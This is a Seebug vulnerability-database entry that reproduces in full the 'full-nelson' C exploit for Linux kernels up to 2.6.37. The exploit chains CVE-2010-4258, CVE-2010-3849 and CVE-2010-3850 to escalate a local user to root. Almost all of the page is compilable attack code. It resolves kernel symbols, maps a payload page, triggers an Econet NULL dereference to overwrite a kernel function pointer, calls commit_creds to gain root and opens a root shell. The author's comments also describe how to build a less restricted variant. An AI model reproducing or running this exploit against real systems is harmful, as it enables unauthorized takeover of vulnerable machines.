Lucene search

K
seebugRootSSV:70365
HistoryJul 01, 2014 - 12:00 a.m.

Linux Kernel <= 2.6.37 - Local Privilege Escalation

2014-07-0100:00:00
Root
www.seebug.org
53

0.0004 Low

EPSS

Percentile

8.6%

No description provided by source.


                                                /*
 * Linux Kernel &#60;= 2.6.37 local privilege escalation
 * by Dan Rosenberg
 * @djrbliss on twitter
 *
 * Usage:
 * gcc full-nelson.c -o full-nelson
 * ./full-nelson
 *
 * This exploit leverages three vulnerabilities to get root, all of which were
 * discovered by Nelson Elhage:
 *
 * CVE-2010-4258
 * -------------
 * This is the interesting one, and the reason I wrote this exploit.  If a
 * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
 * word will be written to a user-specified pointer when that thread exits.
 * This write is done using put_user(), which ensures the provided destination
 * resides in valid userspace by invoking access_ok().  However, Nelson
 * discovered that when the kernel performs an address limit override via
 * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
 * etc.), this override is not reverted before calling put_user() in the exit
 * path, allowing a user to write a NULL word to an arbitrary kernel address.
 * Note that this issue requires an additional vulnerability to trigger.
 *
 * CVE-2010-3849
 * -------------
 * This is a NULL pointer dereference in the Econet protocol.  By itself, it&#39;s
 * fairly benign as a local denial-of-service.  It&#39;s a perfect candidate to
 * trigger the above issue, since it&#39;s reachable via sock_no_sendpage(), which
 * subsequently calls sendmsg under KERNEL_DS.
 *
 * CVE-2010-3850
 * -------------
 * I wouldn&#39;t be able to reach the NULL pointer dereference and trigger the
 * OOPS if users weren&#39;t able to assign Econet addresses to arbitrary
 * interfaces due to a missing capabilities check.
 *
 * In the interest of public safety, this exploit was specifically designed to
 * be limited:
 *
 *  * The particular symbols I resolve are not exported on Slackware or Debian
 *  * Red Hat does not support Econet by default
 *  * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and
 *    Debian
 *
 * However, the important issue, CVE-2010-4258, affects everyone, and it would
 * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly
 * more sophisticated version of this that doesn&#39;t have the roadblocks I put in
 * to prevent abuse by script kiddies.
 *
 * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.
 *
 * NOTE: the exploit process will deadlock and stay in a zombie state after you
 * exit your root shell because the Econet thread OOPSes while holding the
 * Econet mutex.  It wouldn&#39;t be too hard to fix this up, but I didn&#39;t bother.
 *
 * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla
 */

#include &#60;stdio.h&#62;
#include &#60;sys/socket.h&#62;
#include &#60;fcntl.h&#62;
#include &#60;sys/ioctl.h&#62;
#include &#60;string.h&#62;
#include &#60;net/if.h&#62;
#include &#60;sched.h&#62;
#include &#60;stdlib.h&#62;
#include &#60;signal.h&#62;
#include &#60;sys/utsname.h&#62;
#include &#60;sys/mman.h&#62;
#include &#60;unistd.h&#62;

/* How many bytes should we clear in our
 * function pointer to put it into userspace? */
#ifdef __x86_64__
#define SHIFT 24
#define OFFSET 3
#else
#define SHIFT 8
#define OFFSET 1
#endif

/* thanks spender... */
unsigned long get_kernel_sym(char *name)
{
        FILE *f;
        unsigned long addr;
        char dummy;
        char sname[512];
        struct utsname ver;
        int ret;
        int rep = 0;
        int oldstyle = 0;

        f = fopen(&#34;/proc/kallsyms&#34;, &#34;r&#34;);
        if (f == NULL) {
                f = fopen(&#34;/proc/ksyms&#34;, &#34;r&#34;);
                if (f == NULL)
                        goto fallback;
                oldstyle = 1;
        }

repeat:
        ret = 0;
        while(ret != EOF) {
                if (!oldstyle)
                        ret = fscanf(f, &#34;%p %c %s\n&#34;, (void **)&addr, &dummy, sname);
                else {
                        ret = fscanf(f, &#34;%p %s\n&#34;, (void **)&addr, sname);
                        if (ret == 2) {
                                char *p;
                                if (strstr(sname, &#34;_O/&#34;) || strstr(sname, &#34;_S.&#34;))
                                        continue;
                                p = strrchr(sname, &#39;_&#39;);
                                if (p &#62; ((char *)sname + 5) && !strncmp(p - 3, &#34;smp&#34;, 3)) {
                                        p = p - 4;
                                        while (p &#62; (char *)sname && *(p - 1) == &#39;_&#39;)
                                                p--;
                                        *p = &#39;\0&#39;;
                                }
                        }
                }
                if (ret == 0) {
                        fscanf(f, &#34;%s\n&#34;, sname);
                        continue;
                }
                if (!strcmp(name, sname)) {
                        fprintf(stdout, &#34; [+] Resolved %s to %p%s\n&#34;, name, (void *)addr, rep ? &#34; (via System.map)&#34; : 
&#34;&#34;);
                        fclose(f);
                        return addr;
                }
        }

        fclose(f);
        if (rep)
                return 0;
fallback:
        uname(&ver);
        if (strncmp(ver.release, &#34;2.6&#34;, 3))
                oldstyle = 1;
        sprintf(sname, &#34;/boot/System.map-%s&#34;, ver.release);
        f = fopen(sname, &#34;r&#34;);
        if (f == NULL)
                return 0;
        rep = 1;
        goto repeat;
}

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

static int __attribute__((regparm(3)))
getroot(void * file, void * vma)
{

        commit_creds(prepare_kernel_cred(0));
        return -1;

}

/* Why do I do this?  Because on x86-64, the address of
 * commit_creds and prepare_kernel_cred are loaded relative
 * to rip, which means I can&#39;t just copy the above payload
 * into my landing area. */
void __attribute__((regparm(3)))
trampoline()
{

#ifdef __x86_64__
        asm(&#34;mov $getroot, %rax; call *%rax;&#34;);
#else
        asm(&#34;mov $getroot, %eax; call *%eax;&#34;);
#endif

}

/* Triggers a NULL pointer dereference in econet_sendmsg
 * via sock_no_sendpage, so it&#39;s under KERNEL_DS */
int trigger(int * fildes)
{
        int ret;
        struct ifreq ifr;

        memset(&ifr, 0, sizeof(ifr));
        strncpy(ifr.ifr_name, &#34;eth0&#34;, IFNAMSIZ);

        ret = ioctl(fildes[2], SIOCSIFADDR, &ifr);

        if(ret &#60; 0) {
                printf(&#34;[*] Failed to set Econet address.\n&#34;);
                return -1;
        }

        splice(fildes[3], NULL, fildes[1], NULL, 128, 0);
        splice(fildes[0], NULL, fildes[2], NULL, 128, 0);

        /* Shouldn&#39;t get here... */
        exit(0);
}

int main(int argc, char * argv[])
{
        unsigned long econet_ops, econet_ioctl, target, landing;
        int fildes[4], pid;
        void * newstack, * payload;

        /* Create file descriptors now so there are two
           references to them after cloning...otherwise
           the child will never return because it
           deadlocks when trying to unlock various
           mutexes after OOPSing */
        pipe(fildes);
        fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0);
        fildes[3] = open(&#34;/dev/zero&#34;, O_RDONLY);

        if(fildes[0] &#60; 0 || fildes[1] &#60; 0 || fildes[2] &#60; 0 || fildes[3] &#60; 0) {
                printf(&#34;[*] Failed to open file descriptors.\n&#34;);
                return -1;
        }

        /* Resolve addresses of relevant symbols */
        printf(&#34;[*] Resolving kernel addresses...\n&#34;);
        econet_ioctl = get_kernel_sym(&#34;econet_ioctl&#34;);
        econet_ops = get_kernel_sym(&#34;econet_ops&#34;);
        commit_creds = (_commit_creds) get_kernel_sym(&#34;commit_creds&#34;);
        prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym(&#34;prepare_kernel_cred&#34;);

        if(!econet_ioctl || !commit_creds || !prepare_kernel_cred || !econet_ops) {
                printf(&#34;[*] Failed to resolve kernel symbols.\n&#34;);
                return -1;
        }

        if(!(newstack = malloc(65536))) {
                printf(&#34;[*] Failed to allocate memory.\n&#34;);
                return -1;
        }

        printf(&#34;[*] Calculating target...\n&#34;);
        target = econet_ops + 10 * sizeof(void *) - OFFSET;

        /* Clear the higher bits */
        landing = econet_ioctl &#60;&#60; SHIFT &#62;&#62; SHIFT;

        payload = mmap((void *)(landing & ~0xfff), 2 * 4096,
                       PROT_READ | PROT_WRITE | PROT_EXEC,
                       MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);

        if ((long)payload == -1) {
                printf(&#34;[*] Failed to mmap() at target address.\n&#34;);
                return -1;
        }

        memcpy((void *)landing, &trampoline, 1024);

        clone((int (*)(void *))trigger,
              (void *)((unsigned long)newstack + 65536),
              CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,
              &fildes, NULL, NULL, target);

        sleep(1);

        printf(&#34;[*] Triggering payload...\n&#34;);
        ioctl(fildes[2], 0, NULL);

        if(getuid()) {
                printf(&#34;[*] Exploit failed to get root.\n&#34;);
                return -1;
        }

        printf(&#34;[*] Got root!\n&#34;);
        execl(&#34;/bin/sh&#34;, &#34;/bin/sh&#34;, NULL);
}